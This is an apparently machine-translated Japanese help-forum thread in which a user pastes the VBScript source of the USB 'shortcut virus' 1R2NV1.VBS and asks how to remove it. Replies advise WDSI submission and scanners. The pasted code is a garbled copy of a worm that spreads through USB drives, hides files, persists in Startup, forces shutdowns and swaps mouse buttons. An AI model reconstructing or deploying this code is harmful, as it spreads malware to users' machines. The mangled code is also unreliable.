ショートカットウイルス「1R2NV1.VBS」
私のシステムはショートカットウイルス「1R2NV1.VBS」に感染しています.cmd attribコマンドを使用して、スクリプトのファイルと内容が表示されています-
エラーが次に再開されます次の
strComputer= "." '(コンピュータ名またはアドレス)
wmi= getObject( "winmgmts:\\"&"\root\cimv2")を設定します.
wmievent= wmi.execnotificationQuery( "select*から1内の__instanceOperationEventのセレクト* TargetInstance ISA 'Win32_PNPentity'とtargetInstance.description= 'USB大容量記憶装置' ")
wshshell= createObject( "WScript.Shell")を設定します( "fs= createObject"( "scripting.filesystemObject")
fs.fileexists( "1r2nv1.vbs")が
fs.deletefile( "1r2nv1.vbs")
fs.fileexists( "1R2nv2.vbs")の場合
objfile= fs.getfile( "1r2nv2.vbs")を設定してください.
objfile.Attributes 2
path= wshshell.specialfolders( "startup")
x= fs.copyFile( "1R2Nv2)の場合、
path= wshshell.specialfolders(" startup ")
x= fs.copyfile(" 1R2Nv2) vbs "、path&"\"、true)
lnk= wshshell.creathortcut(path&" windows service.lnk ")
lnk.targetpath= path&"\1r2nv2.vbs "
lnk.iconlocation= "c:\windows\system32\shell32.dll、4"
lnk.save
set lnk= nothing
hidden= "hkcu\software\Microsoft\Windows\currentVersion\Explorer\advanced\hidden "" hkcu\software\Microsoft\windows\currentVersion\Explorer\Advanced\ShowPerHidden ""
st= wshshell.regread(非表示)
st= 2
wshshell.regwrite hidden、2、 "reg_dword"
wshshell.regwrite Shidded、0、 "Reg_dwo RD ""
wshshell.sendkeys( "{f5}")
datepart( "d"、現在)= 9
wscript.sleep(10000)
strcmd= " shutdown-s-f-t 0-c system-error "
wshshell.run strcmd
fs.folderexists(" Systems ")("システム ")
wshshell.run" cmd/cを開始するシステム "、0
while
while
while
wmievent.nextEvent()
case usb.path_.class
ケース" __instanceCreationevent "
隠し= "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden" "
hkcu\software\Microsoft\windows\currentVersion\Explorer\Advanced\ShowPherhidden" "
st= wshshell.regread(隠された)
ST= 2でない場合は、
wshshell.regwrite hidden、2、 "reg_dword"
wshshell.regwrite Shidded、0、 "Reg_Dword"
const const und br= 1>FS.Drivesの各ODRIVEの場合は、
ODRive.Drivetype= RemovableおよびODRive.DriveLetter<>"A"でない場合は<>"" ODRive.driveletter&":\Systems")
FS.CreateFolder ODRive.DriveLetter&":\"&"システム"
objfolderを設定します= fs.getFolder(ODRive.driveLetter&":\Systems")
objfolder.Attributesと2次の場合は2
fs.folderexistsの場合
(ODRive.DriveLetter&":\Systems")次に、fs.getFolder(ODRive.DriveLetter&":\")の各ファイルに.ファイル
file.Move ODRive.DriveLetter&":\Systems \"
fs.getFolder(ODRive.driveLetter&":\")の各サブフォルダの次へ
サブフォルダ
subfolder.move odrive.driveletter&":\systems \"
次へ
終わり
fs.fileexists(ODRive.DriveLetter&":\1r2nv2.vbs")であれば、
fs.copyfile "1r2nv2.vbs"、odrive.driveletter&":\"、true
set objfile= fs.getFile(ODRive.driveLetter&":\1R2Nv2.vbs")
objfile.Attributesと2次の場合は2
BR>SET LNK= wshshell.creathortCut(ODRive.DriveLetter&":\"&ODRive.Volumename&".lnk")
lnk.targetpath= "cmd.exe"
lnk.arguments= "/c start 1r2nv2.vbs&exit "
lnk.iconlocation="c:\windows\system32\shell3 2.dll、7 "
lnk.save
set lnk= nothing
fs.copyfile path&"\1r2nv2.vbs "、odrive.driveletter&":\"
fsの場合フォックスレXists(ODRive.DriveLetter&":\Systems\AST")
wshshell.run.driveletter&":\systems\asst\ast.vbs" "" "
wscript.sleep(30000)
whee日の場合
weekday(date)= vbmonday
wshshell.run "cmd/c rundll32 user32、swapmousebutton"、0、true、true、true
日付)= vbthursday
wshshell.run "cmd/c rundll32 user32、swapmouseButton"、0、true
end select
Wend
私はすべてのUSBドライバ(クリーンフォーマット後でさえ)が挿入されるようになる前にスクリプトが実行されたと思います私のPCでは感染しています.Windows Defenderは、私のUSBまたは私のシステムで何も検出できません.このウイルスによって行われた関連レジストリエントリを削除して、私のPCを修正してください.
wdsiでファイルを送信して提出IDA9922AE0-840A-4F2C-A70A-6251A9B69131
返信リスト(回答:4)
WDSIを提出していただきありがとうございます、誰かがあなたの投稿に答えます.
あなたは感染したのか知っていますか?
ウェブサイトまたはUSB?
応答2# ->にスキップ3 #Yashovaああ、私が言及したいもう1つのことは、私がライブ chat の上でマイクロソフトサポートと連絡を取り合ったことです.Support Execはリモート接続を介して接続されている、Windows DefenderのオフラインScanを実行する(接続が失われます).
PCがオンラインになっていて、リモートクライアントが再接続しようとした場合、EXECは残っていました.Scanは何も見つかりませんでした.
応答3# ->にスキップ4 #Cyber他にサンプルがある場合は、必ずそれらをWDSIに送信してください.
チームからの最終分析を待つ必要があります.
その間、Malwarebytes(スキャナーのみ)などの他のサードパーティスキャナーを使用して、それが削除できるかどうかを確認することもできます.
関連質問
- 何もダウンロードできません.
- Windows Defenderは、ベクトルキャストソフトウェアの.exeをブロックしています
- WebNavigatorBrowserマルウェアのインストールをトレースする方法
- ウェブサイトを保護するためのウイルス対策の取り付け.
- Defenderは数多くのQNAP QSync一時ファイルを報告しますWACATAC.Bに感染している!ML.しかし、最終報告書は0の脅威を示しています.
- ブラウザアシスタント
- ハッキングされたPCを修正する機会はありますか?
- スクリーンの右下隅にこれらのポップアップを入手するのをやめるにはどうすればよいですか.
- ダウンロードされたFTPアプリはアンインストールされません
- ウォッチスレッドとは何ですか?